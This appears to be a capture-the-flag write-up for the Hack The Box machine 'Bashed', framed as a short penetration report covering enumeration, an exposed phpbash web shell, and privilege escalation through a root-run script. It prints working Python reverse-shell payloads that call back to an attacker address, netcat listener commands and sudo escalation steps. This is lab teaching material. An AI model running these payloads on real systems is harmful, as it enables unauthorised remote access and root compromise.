# Bashed (Easy) ## Lesson Learn ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FEeWTjd86RHcZ0i75LY22%2Fbashed.PNG?alt=media\&token=4320b600-4211-4e56-a8df-3842fd750df4) ## Report-Penetration **Vulnerable Exploit:** Misconfigure on Web Shell File **System Vulnerable:** 10.10.10.68 **Vulnerability Explanation:** The application fails to restrict access to the web shell file which allows the unauthorizing user access to /dev directory as well as the web shell file. For escalation is vulnerable because of misconfigure permission which allow www-data user escalate to other user and execute file as root. **Privilege Escalation Vulnerability:** Misconfigure permission of user **Vulnerability Fix:** Restrict access to sensitive directory or file from unauthorize user and least privilege user on the machine. **Severity:** High **Step to Compromise the Host:** ## Reconnaissance ``` nmap -sC -sV -p- -T4 10.10.10.68 ``` ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2F1Oxsdx7CsTAVJ0eTB4hy%2F1.png?alt=media\&token=0ab858c4-e3a6-46fa-a09a-29c3ab626457) ## Enumeration **Port 80 Apache/2.4.18 (Ubuntu)** We have found only port 80 open on the remote machine. Let browse and check on port 80. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2Fa8vH2tV0Bk03xzkzGmCV%2F1.png?alt=media\&token=d9ed155e-8fee-47a8-b891-7e7dd035dd9f) ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2Fi43tC0RUNwKDtlyc8QE2%2F1.png?alt=media\&token=c5e810f4-5c87-4475-8bcc-cb7304887215) Let start enumerating with gobuster to find if there is any directory hidden. We have found interesting directory is **/dev.** ``` $ gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.68 [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/10/28 10:25:08 Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/] /php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/] /css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/] /dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/] /js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/] /images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/] /fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/] /server-status (Status: 403) [Size: 299] =============================================================== 2021/10/28 10:28:28 Finished =============================================================== ``` We have seen the file name **phpbash.php** as the display on the main web page. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2F9JaIKRSXh03B03pN7Xwg%2F1.png?alt=media\&token=4741b113-22f4-4332-9947-12e12a4c5dac) By click on that file, it redirects us to web shell which we can execute command on the remote machine. ## Exploitation By enumerating, we found netcat installed on machine. Let try to get reverse shell but unfortunately we can't. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FAddt3BLLjn5Dpt0dw0Uc%2F1.png?alt=media\&token=291387aa-74c9-4897-93e8-17b4a2777c11) Let start enumerating if there is any other tool available on the machine. We have found python. We can get reverse shell by python script. ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FKEgcjVku9yH1zDxE7O74%2F1.png?alt=media\&token=cb55002b-ae69-4f92-abd7-d7a93b1a2e81) By listening with netcat on port 4444, we suddenly get shell on the machine. ``` nc -lvp 4444 ``` ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FsRuOWukxwEKKFiT2x5kw%2F1.png?alt=media\&token=2300b330-4615-4eb1-ae76-9729a40a2e4c) ## Privilege Escalation First thing first, Once I get onto the machine, I will run `sudo -l` on the machine to check. We found out that we can run as user scriptmanager without knowing the password. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FKruby6I9Z09oA3gHUK4z%2F1.png?alt=media\&token=7f45f369-5964-49d2-8be5-b28526a42a8c) By enumerating on the machine, we found interesting directory /scripts which own by user scriptmanager whereas the rest own by root. It's seem interesting to us. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FQmuW6fzfILDByTQ6vgsj%2F1.png?alt=media\&token=aaf5403e-9322-4821-9848-64a3f7a34910) Let escalate our privilege to scriptmanager user. ``` sudo -u scriptmanager /bin/bash ``` ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FDYjo0acxWmpLbEFMFYOb%2F1.png?alt=media\&token=b717b75e-8f29-44d1-ab80-35d14c6a50b2) Once we are accessing to the script folder, we found there are 2 files. For **test.py** which own by user scriptmanager and **test.txt** own by root. ### Auto script python ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FDWBM947TxjlwqvmaaWnT%2F1.png?alt=media\&token=efaaa371-cd12-4da3-bf76-cd93dd1fb5d5) Viewing the file test.py, it seems like it schedules to write file test.txt as root permission. As we have permission on file test.py, we can replace it with reverse shell code on file test.py. ``` import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.31",5555)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/bash","-i"]); ``` We can host this file on our kali machine and let remote machine download and replace it. ``` python -m SimpleHTTPServer 80 ``` ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FMq8zRr1rZw4jONQqdo13%2F1.png?alt=media\&token=87cf41b2-a794-47ef-9de6-e4cfbcd41f08) Let change file name **test.py.1** to **test.py** to replace the existing file and set permission on file. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FZ4Kjke8wWooP9jLp4AqB%2F1.png?alt=media\&token=31b3ebd2-7a9d-403a-b008-ab3eedaf00d7) Let run netcat listener on port 5555 and wait for sometimes for script to execute. ![](https://1535793005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqDX4NWkPelZggTpGCfyF%2Fuploads%2FiMFSWUVcKmdNn7jRyXlI%2F1.png?alt=media\&token=2b9efe04-f127-4618-a48a-84d748908b37)